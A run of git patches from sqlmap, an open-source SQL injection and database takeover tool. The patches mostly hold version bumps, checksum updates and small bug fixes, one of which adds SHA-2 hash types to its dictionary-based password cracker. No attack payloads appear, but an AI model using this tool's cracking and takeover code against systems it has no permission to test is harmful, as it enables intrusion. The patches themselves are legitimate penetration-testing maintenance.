0f581182871148b0456a691ae85b04c0 lib/controller/action.py -94872ce72dc2628cdedf2eb82cba716e lib/controller/checks.py +bc3800ec099df253968b3a7fc1ffce44 lib/controller/checks.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -569498929d03e722dbfefaf65c387006 lib/core/settings.py +a4ded87968a06825056f25955c009db6 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12bed9603b6fba3e5ffda11d584bc449 lib/core/target.py From 2e017eee9989c2932a8baff3fa23a93e8ea16936 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 10 Aug 2018 14:16:27 +0200 Subject: [PATCH 228/428] Fixes #3203 --- lib/core/settings.py | 2 +- lib/core/target.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index ffce4051c6f..54f12963cd7 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.6" +VERSION = "1.2.8.7" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/target.py b/lib/core/target.py index bceafe5c86c..43e153e1e01 100644 --- a/lib/core/target.py +++ b/lib/core/target.py @@ -674,7 +674,7 @@ def _createTargetDirs(): conf.outputPath = getUnicode(conf.outputPath) try: - with codecs.open(os.path.join(conf.outputPath, "target.txt"), "w+", UNICODE_ENCODING) as f: + with openFile(os.path.join(conf.outputPath, "target.txt"), "w+") as f: f.write(kb.originalUrls.get(conf.url) or conf.url or conf.hostname) f.write(" (%s)" % (HTTPMETHOD.POST if conf.data else HTTPMETHOD.GET)) f.write(" # %s" % getUnicode(subprocess.list2cmdline(sys.argv), encoding=sys.stdin.encoding)) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 4673e63ee7f..e9894a3076b 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,10 +48,10 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -a4ded87968a06825056f25955c009db6 lib/core/settings.py +0a3b05220e19a5d4d0b1fe1fc1295c79 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py -12bed9603b6fba3e5ffda11d584bc449 lib/core/target.py +5b7ff6f49ff3af62f8c12f74b6d49dd2 lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py e896992e4db26605ab1e73615b1f9434 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py From b899ab9eb369a7698d542e2f96248d596b7df320 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 13 Aug 2018 15:27:08 +0200 Subject: [PATCH 229/428] Bug fix (sha-256,sha384... were recognized, though, not cracked) --- lib/core/settings.py | 2 +- lib/utils/hash.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 54f12963cd7..b7226f9468b 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.7" +VERSION = "1.2.8.8" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/utils/hash.py b/lib/utils/hash.py index f92f19bd038..4b4e194fb2c 100644 --- a/lib/utils/hash.py +++ b/lib/utils/hash.py @@ -903,7 +903,7 @@ def dictionaryAttack(attack_dict): if hash_regex in (HASH.MD5_BASE64, HASH.SHA1_BASE64, HASH.SHA256_BASE64, HASH.SHA512_BASE64): item = [(user, hash_.decode("base64").encode("hex")), {}] - elif hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC, HASH.APACHE_SHA1): + elif hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC, HASH.SHA224_GENERIC, HASH.SHA256_GENERIC, HASH.SHA384_GENERIC, HASH.SHA512_GENERIC, HASH.APACHE_SHA1): item = [(user, hash_), {}] elif hash_regex in (HASH.SSHA,): item = [(user, hash_), {"salt": hash_.decode("base64")[20:]}] diff --git a/txt/checksum.md5 b/txt/checksum.md5 index e9894a3076b..b44034b11e6 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -0a3b05220e19a5d4d0b1fe1fc1295c79 lib/core/settings.py +588c1f076627097ed858094309961af9 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 5b7ff6f49ff3af62f8c12f74b6d49dd2 lib/core/target.py @@ -107,7 +107,7 @@ de9620f03231d8329ee8434884b6bacd lib/utils/deps.py f7af65aa47329d021e2b2cc8521b42a4 lib/utils/getch.py 7af29f61302c8693cd6436d4b69e22d3 lib/utils/har.py 062e4e8fc43ac54305a75ddd0d482f81 lib/utils/hashdb.py -4d5b2262ad495301706a4cf4c565abec lib/utils/hash.py +05dbc49838ca0454ce401ad616acf8c5 lib/utils/hash.py 011d2dbf589e0faa0deca61a651239cc lib/utils/htmlentities.py 1e5532ede194ac9c083891c2f02bca93 lib/utils/__init__.py 010d8327239d33af4ce9f25683cfc012 lib/utils/pivotdumptable.py From 03e4741a6913e6ebbfc7674dbbe708813bc2d0df Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 17 Aug 2018 19:45:34 +0200 Subject: [PATCH 230/428] Trivial patch (display of used user queries) --- lib/core/settings.py | 2 +- plugins/generic/custom.py | 1 + txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index b7226f9468b..7c500c5a9cb 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.8" +VERSION = "1.2.8.9" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/generic/custom.py b/plugins/generic/custom.py index b314410db3a..599b2ccf448 100644 --- a/plugins/generic/custom.py +++ b/plugins/generic/custom.py @@ -88,6 +88,7 @@ def sqlShell(self): try: query = raw_input("sql-shell> ") query = getUnicode(query, encoding=sys.stdin.encoding) + query = query.strip("; ") except KeyboardInterrupt: print errMsg = "user aborted" diff --git a/txt/checksum.md5 b/txt/checksum.md5 index b44034b11e6..280ca85e139 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -588c1f076627097ed858094309961af9 lib/core/settings.py +2f3aba628e9e54988d510c5c1930e77a lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 5b7ff6f49ff3af62f8c12f74b6d49dd2 lib/core/target.py @@ -204,7 +204,7 @@ a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py 36acb9a5966af21b32e8558b0d50653d plugins/dbms/sybase/syntax.py 79f6c7017db4ded8f74a0117188836ff plugins/dbms/sybase/takeover.py 34d181a7086d6dfc7e72ae5f8a4cfe0f plugins/generic/connector.py -e6cd1c5a5244d83396b401f7db43d323 plugins/generic/custom.py +ce6a6ff713852b5eca7b78316cc941c4 plugins/generic/custom.py 156c227dbe765da3d0fd2976fbe18d8b plugins/generic/databases.py 4e2b366bb9cfdaaed719b219913357c6 plugins/generic/entries.py d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py From 6d28ca1f933804610f795f17afe629f9f95735f7 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 18 Aug 2018 00:02:39 +0200 Subject: [PATCH 231/428] Bug fix (single-quoted strings in long results caused line breaks) --- lib/core/settings.py | 2 +- thirdparty/ansistrm/ansistrm.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 7c500c5a9cb..2c700e8e72f 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.9" +VERSION = "1.2.8.10" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/thirdparty/ansistrm/ansistrm.py b/thirdparty/ansistrm/ansistrm.py index 1b91ccaab4b..7dc46b68e76 100644 --- a/thirdparty/ansistrm/ansistrm.py +++ b/thirdparty/ansistrm/ansistrm.py @@ -190,7 +190,7 @@ def colorize(self, message, levelno): reset = self.reset + self.bold else: reset = self.reset - message = message.replace(string, ''.join((self.csi, str(self.color_map["white"] + 30), 'm', string, reset)), 1) + message = message.replace("'%s'" % string, "'%s'" % ''.join((self.csi, str(self.color_map["white"] + 30), 'm', string, reset)), 1) else: message = ''.join((self.csi, ';'.join(params), 'm', message, self.reset)) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 280ca85e139..9ca0b4f3300 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -2f3aba628e9e54988d510c5c1930e77a lib/core/settings.py +4a7ac205b72dafaf6c89cc4a0a8459f4 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 5b7ff6f49ff3af62f8c12f74b6d49dd2 lib/core/target.py @@ -285,7 +285,7 @@ f2b9eac52d346315f5705f71beeda791 tamper/varnish.py 0e40966a51d1eb5d42a2159d2015a8a4 tamper/versionedkeywords.py 0fba004bf1be6edbefbda89f23f4e518 tamper/versionedmorekeywords.py de532c4e3160039335010c499129d54f tamper/xforwardedfor.py -3f6a3d322a4629d5bbd93f43ff8e59cc thirdparty/ansistrm/ansistrm.py +c03de596a9090650c83e8ef722b82833 thirdparty/ansistrm/ansistrm.py d41d8cd98f00b204e9800998ecf8427e thirdparty/ansistrm/__init__.py 8e775c25bc9e84891ad6fcb4f0005c23 thirdparty/beautifulsoup/beautifulsoup.py cb2e1fe7c404dff41a2ae9132828f532 thirdparty/beautifulsoup/__init__.py From e51db6b355b0dbb227198c71121084089d360a3b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 20 Aug 2018 19:33:19 +0200 Subject: [PATCH 232/428] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index f1e5198d968..0a724d40710 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,6 @@ # sqlmap -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. From bc13d8923b5d2758dc3335d8d2b1212c6142dd27 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 20 Aug 2018 19:43:09 +0200 Subject: [PATCH 233/428] Adding long_description to PyPI upload script --- extra/shutils/pypi.sh | 3 ++- lib/core/settings.py | 2 +- txt/checksum.md5 | 2 +- 3 files changed, 4 insertions(+), 3 deletions(-) diff --git a/extra/shutils/pypi.sh b/extra/shutils/pypi.sh index dc82acbeb55..c8712b558fa 100755 --- a/extra/shutils/pypi.sh +++ b/extra/shutils/pypi.sh @@ -25,7 +25,8 @@ from setuptools import setup, find_packages setup( name='sqlmap', version='$VERSION', - description="Automatic SQL injection and database takeover tool", + description='Automatic SQL injection and database takeover tool', + long_description='sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.', author='Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar', author_email='bernardo@sqlmap.org, miroslav@sqlmap.org', url='https://sqlmap.org', diff --git a/lib/core/settings.py b/lib/core/settings.py index 2c700e8e72f..d2e606b55a9 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.10" +VERSION = "1.2.8.11" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 9ca0b4f3300..7ad7e5e2053 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -4a7ac205b72dafaf6c89cc4a0a8459f4 lib/core/settings.py +fd4bb6f2f20b269d171bc215cc24a493 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 5b7ff6f49ff3af62f8c12f74b6d49dd2 lib/core/target.py From 2542b6d2414cdc35a5ce53e774d00956bd815b57 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 20 Aug 2018 19:44:25 +0200 Subject: [PATCH 234/428] Minor patch (https version of site is not available) --- extra/shutils/pypi.sh | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/extra/shutils/pypi.sh b/extra/shutils/pypi.sh index c8712b558fa..aa1ad0aab53 100755 --- a/extra/shutils/pypi.sh +++ b/extra/shutils/pypi.sh @@ -29,7 +29,7 @@ setup( long_description='sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.', author='Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar', author_email='bernardo@sqlmap.org, miroslav@sqlmap.org', - url='https://sqlmap.org', + url='http://sqlmap.org', download_url='https://github.com/sqlmapproject/sqlmap/archive/$VERSION.zip', license='GNU General Public License v2 (GPLv2)', packages=find_packages(), diff --git a/lib/core/settings.py b/lib/core/settings.py index d2e606b55a9..1338d675dd3 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.11" +VERSION = "1.2.8.12" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 7ad7e5e2053..27c47cf979a 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -fd4bb6f2f20b269d171bc215cc24a493 lib/core/settings.py +aaeca967ebd83967b78a9a56fb029696 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 5b7ff6f49ff3af62f8c12f74b6d49dd2 lib/core/target.py From 36e62fe8a7e9c3754f1fd6c52e2bfe013a983c3f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 22 Aug 2018 10:20:26 +0200 Subject: [PATCH 235/428] Minor update --- lib/core/settings.py | 2 +- lib/request/pkihandler.py | 11 +++++++++-- txt/checksum.md5 | 4 ++-- 3 files changed, 12 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 1338d675dd3..ace8cdacb2e 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.12" +VERSION = "1.2.8.13" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/pkihandler.py b/lib/request/pkihandler.py index 369cf7d4d74..71a5eb352ac 100644 --- a/lib/request/pkihandler.py +++ b/lib/request/pkihandler.py @@ -9,6 +9,8 @@ import urllib2 from lib.core.data import conf +from lib.core.common import getSafeExString +from lib.core.exception import SqlmapConnectionException class HTTPSPKIAuthHandler(urllib2.HTTPSHandler): def __init__(self, auth_file): @@ -19,5 +21,10 @@ def https_open(self, req): return self.do_open(self.getConnection, req) def getConnection(self, host, timeout=None): - # Reference: https://docs.python.org/2/library/ssl.html#ssl.SSLContext.load_cert_chain - return httplib.HTTPSConnection(host, cert_file=self.auth_file, key_file=self.auth_file, timeout=conf.timeout) + try: + # Reference: https://docs.python.org/2/library/ssl.html#ssl.SSLContext.load_cert_chain + return httplib.HTTPSConnection(host, cert_file=self.auth_file, key_file=self.auth_file, timeout=conf.timeout) + except IOError, ex: + errMsg = "error occurred while using key " + errMsg += "file '%s' ('%s')" % (self.auth_file, getSafeExString(ex)) + raise SqlmapConnectionException(errMsg) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 27c47cf979a..18b703e9a3c 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -aaeca967ebd83967b78a9a56fb029696 lib/core/settings.py +0cb27d1543a4cd5a1f466846965a2bf3 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 5b7ff6f49ff3af62f8c12f74b6d49dd2 lib/core/target.py @@ -77,7 +77,7 @@ dd4598675027fae99f2e2475b05986da lib/request/direct.py 1e5532ede194ac9c083891c2f02bca93 lib/request/__init__.py a5cbc19ee18bd4b848515eb3ea3291f0 lib/request/inject.py aaf956c1e9855836c3f372e29d481393 lib/request/methodrequest.py -51eeaa8abf5ba62aaaade66d46ff8b00 lib/request/pkihandler.py +83c7a13e38ad5eedb6bb13463a7a9e90 lib/request/pkihandler.py 2c3774b72586985719035b195f144d7b lib/request/rangehandler.py 3cd9d17fc52bb62db29e0e24fc4d8a97 lib/request/redirecthandler.py 7f12d8f3b6665ed7053954bba70ff718 lib/request/templates.py From f20e7b403ae167fcc9aeb2d91cede76d96d60409 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 22 Aug 2018 10:41:43 +0200 Subject: [PATCH 236/428] Fixes #3211 --- lib/core/common.py | 2 +- lib/core/settings.py | 2 +- plugins/dbms/mysql/connector.py | 2 +- txt/checksum.md5 | 6 +++--- 4 files changed, 6 insertions(+), 6 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index c1271be4c52..99cce710312 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1347,7 +1347,7 @@ def parseTargetDirect(): conf.hostname = "localhost" conf.port = 0 - conf.dbmsDb = details.group("db") + conf.dbmsDb = details.group("db").strip() if details.group("db") is not None else None conf.parameters[None] = "direct connection" break diff --git a/lib/core/settings.py b/lib/core/settings.py index ace8cdacb2e..318406673f0 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.13" +VERSION = "1.2.8.14" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/dbms/mysql/connector.py b/plugins/dbms/mysql/connector.py index 7f2be46ef11..7521b2bc2b7 100644 --- a/plugins/dbms/mysql/connector.py +++ b/plugins/dbms/mysql/connector.py @@ -37,7 +37,7 @@ def connect(self): try: self.connector = pymysql.connect(host=self.hostname, user=self.user, passwd=self.password, db=self.db, port=self.port, connect_timeout=conf.timeout, use_unicode=True) - except (pymysql.OperationalError, pymysql.InternalError), msg: + except (pymysql.OperationalError, pymysql.InternalError, pymysql.ProgrammingError), msg: raise SqlmapConnectionException(msg[1]) except struct.error, msg: raise SqlmapConnectionException(msg) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 18b703e9a3c..4db5c35a75f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -655326aed648209c5477464825cebea8 lib/core/common.py +3652331fec15a31ace15d8cce4024495 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -0cb27d1543a4cd5a1f466846965a2bf3 lib/core/settings.py +f1c4b44edd5b5dcd2a03c71d4d8d3ef8 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 5b7ff6f49ff3af62f8c12f74b6d49dd2 lib/core/target.py @@ -168,7 +168,7 @@ f1f1541a54faf67440179fa521f99849 plugins/dbms/mssqlserver/enumeration.py f25c50a95e5390ecd32be5a011637349 plugins/dbms/mssqlserver/__init__.py 612be1929108e7b4512a49a4a3837bbc plugins/dbms/mssqlserver/syntax.py 3c0845fa526e1bb7bbe636fcfcbcc4a6 plugins/dbms/mssqlserver/takeover.py -f6e1f3f09f32b9cb2ca11c016d373423 plugins/dbms/mysql/connector.py +11a5724fdc0b0c0eb2626d952cda216a plugins/dbms/mysql/connector.py 445164daf59b890aeacc968af58fcb53 plugins/dbms/mysql/enumeration.py 4578fa29f04d0a75499f9668466ded07 plugins/dbms/mysql/filesystem.py 4e23494d0a8f41c22ec3861fb404e9f7 plugins/dbms/mysql/fingerprint.py From 2dfc3837009152052dd727dc97ef40eccc530d5d Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 22 Aug 2018 17:58:00 +0200 Subject: [PATCH 237/428] Fixes #3215 --- lib/core/settings.py | 2 +- plugins/generic/databases.py | 2 ++ txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 318406673f0..2ee193f5e08 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.14" +VERSION = "1.2.8.15" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py index 6e9ec1e638e..c399ed13744 100644 --- a/plugins/generic/databases.py +++ b/plugins/generic/databases.py @@ -601,6 +601,8 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod if values is None: values = inject.getValue(query, blind=False, time=False) + if values and isinstance(values[0], basestring): + values = [values] if Backend.isDbms(DBMS.MSSQL) and isNoneValue(values): index, values = 1, [] diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 4db5c35a75f..3de69dd1d81 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -f1c4b44edd5b5dcd2a03c71d4d8d3ef8 lib/core/settings.py +3dfc00af3de897fbe62c6b2d5a397c13 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 5b7ff6f49ff3af62f8c12f74b6d49dd2 lib/core/target.py @@ -205,7 +205,7 @@ a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py 79f6c7017db4ded8f74a0117188836ff plugins/dbms/sybase/takeover.py 34d181a7086d6dfc7e72ae5f8a4cfe0f plugins/generic/connector.py ce6a6ff713852b5eca7b78316cc941c4 plugins/generic/custom.py -156c227dbe765da3d0fd2976fbe18d8b plugins/generic/databases.py +78813e60e7108f78ef1af46d360f41bf plugins/generic/databases.py 4e2b366bb9cfdaaed719b219913357c6 